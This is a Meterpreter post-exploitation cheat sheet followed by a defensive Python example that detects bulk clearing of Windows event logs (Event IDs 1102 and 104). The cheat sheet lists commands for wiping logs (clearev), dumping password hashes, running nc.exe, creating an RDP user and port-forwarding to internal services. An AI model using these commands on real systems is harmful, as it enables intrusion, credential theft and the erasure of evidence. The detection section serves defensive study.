This sheet contains commands often issued via a Meterpreter shell.
- Use the `background` command to send the shell session into the background.
- Use `sessions -l` to list the active sessions.
- Use `sessions -i (NUMBER)` to interact with the session of ID (NUMBER).
- Use `clearev` to clear the target system's logs.
- Use `download C:\boot.ini` to download a file from the target.
- Use the `upload` command to upload a payload or file to the target system.
- Use `pwd` and `cd` to navigate the target's file system.
- Use `edit` to open vim with a file on the target server.
- Use `search` to search the file system in a `grep -R` or `find` style.
- Use `execute C:\nc.exe` to execute a program (here C:\nc.exe) on the target's file system.
- Use `hashdump` to get the NT/LM hashes from the target system.
- Use `idletime` to display how long the currently logged-in user has been idle at the target system.
- Use `ipconfig` to get network information from the target system.
- Use the `migrate` command to migrate the Meterpreter shell to another PID. The shell will inherit that PID's effective user ID.
- Use `run getgui -u (UID) -p (PASSWD)` to create a user and enable RDP on a compromised machine.
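From the defender's side, `clearev` empties the Application, System and Security logs through the Windows event-log API, and that action itself is recorded: clearing the Security log writes Event ID 1102 ("The audit log was cleared") to the Security log, and clearing the System or Application log writes Event ID 104 to the System log. The following is an added detection example, not part of the original cheat sheet; it runs over a few constructed JSON-lines records (an assumed simplified export format, not a real capture) and flags hosts where several logs were cleared within one short window, which is exactly the pattern a single `clearev` leaves behind.

```python
"""Detect Windows event-log clearing (the artifact of Meterpreter's clearev).

Added example, not from the original cheat sheet.  Input is a constructed
JSON-lines export with a simplified field set (assumed format): one record
per line with time, host, channel, event_id and optionally user and the
name of the log that was cleared.
"""
import json
from datetime import datetime, timedelta

# Constructed sample data: one benign logon, then all three logs cleared on
# WS01 within two seconds (what a single clearev produces), then benign
# process creation on WS02.
SAMPLE_EVENTS = """\
{"time": "2023-01-01T10:00:00Z", "host": "WS01", "channel": "Security", "event_id": 4624, "user": "alice"}
{"time": "2023-01-01T10:05:12Z", "host": "WS01", "channel": "Security", "event_id": 1102, "user": "alice"}
{"time": "2023-01-01T10:05:13Z", "host": "WS01", "channel": "System", "event_id": 104, "user": "alice", "cleared_channel": "System"}
{"time": "2023-01-01T10:05:13Z", "host": "WS01", "channel": "System", "event_id": 104, "user": "alice", "cleared_channel": "Application"}
{"time": "2023-01-01T11:00:00Z", "host": "WS02", "channel": "Security", "event_id": 4688, "user": "bob"}
"""

# Event IDs written when a log is cleared via the Windows API.
LOG_CLEARED_IDS = {
    1102: "Security log cleared",          # recorded in the Security log
    104: "System/Application log cleared",  # recorded in the System log
}


def parse_events(text):
    """Yield one dict per non-empty JSON line."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def find_log_clears(text):
    """Return one alert dict per log-clearing record, in input order."""
    alerts = []
    for ev in parse_events(text):
        eid = ev.get("event_id")
        if eid not in LOG_CLEARED_IDS:
            continue
        # Event 104 names the cleared log in its body; 1102 is always Security.
        cleared = ev.get("cleared_channel", ev["channel"])
        alerts.append({
            "time": datetime.fromisoformat(ev["time"].replace("Z", "+00:00")),
            "host": ev["host"],
            "user": ev.get("user", "?"),
            "event_id": eid,
            "cleared_log": cleared,
            "description": LOG_CLEARED_IDS[eid],
        })
    return alerts


def find_bulk_clears(alerts, window=timedelta(seconds=60)):
    """Map host -> sorted list of distinct logs cleared within `window`.

    A single cleared log can be routine maintenance; two or more distinct
    logs cleared on one host within a minute is the clearev signature.
    """
    by_host = {}
    for a in alerts:
        by_host.setdefault(a["host"], []).append(a)
    bulk = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda a: a["time"])
        for i, first in enumerate(evs):
            logs = {first["cleared_log"]}
            for later in evs[i + 1:]:
                if later["time"] - first["time"] > window:
                    break
                logs.add(later["cleared_log"])
            if len(logs) >= 2:
                bulk[host] = sorted(logs)
                break
    return bulk


if __name__ == "__main__":
    found = find_log_clears(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['time'].isoformat()} {a['host']} user={a['user']} "
              f"id={a['event_id']} {a['description']} ({a['cleared_log']})")
    for host, logs in find_bulk_clears(found).items():
        print(f"ALERT: {host} cleared {len(logs)} logs within 60s: {', '.join(logs)}")
```

Forwarding Security and System events off the host before they can be cleared (Windows Event Forwarding or an agent) is what makes this check useful: once `clearev` has run, the 1102 and 104 records are the only evidence left locally, and even those can be cleared again.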
The `portfwd` command can be used to forward a port on your attacker machine to an internal service on the target system. If a service is listening on localhost (127.0.0.1) on the target system, we can make it reachable through our attacker machine with the following command and syntax:
meterpreter> portfwd add -l (PORT ON ATTACKER MACHINE) -p (PORT ON TARGET MACHINE) -r (IP ADDRESS ON TARGET SYSTEM)
For example, a service bound to an internal port, such as MySQL on 3306 listening on 127.0.0.1, cannot be reached via the target's public IP address. We can think of it as running on the loopback adapter rather than on eth0.
meterpreter> portfwd add -l 3307 -p 3306 -r 10.10.10.254
The above command forwards all traffic arriving at port 3307 on my attacker system to the internal service on port 3306 of the target's loopback interface (127.0.0.1).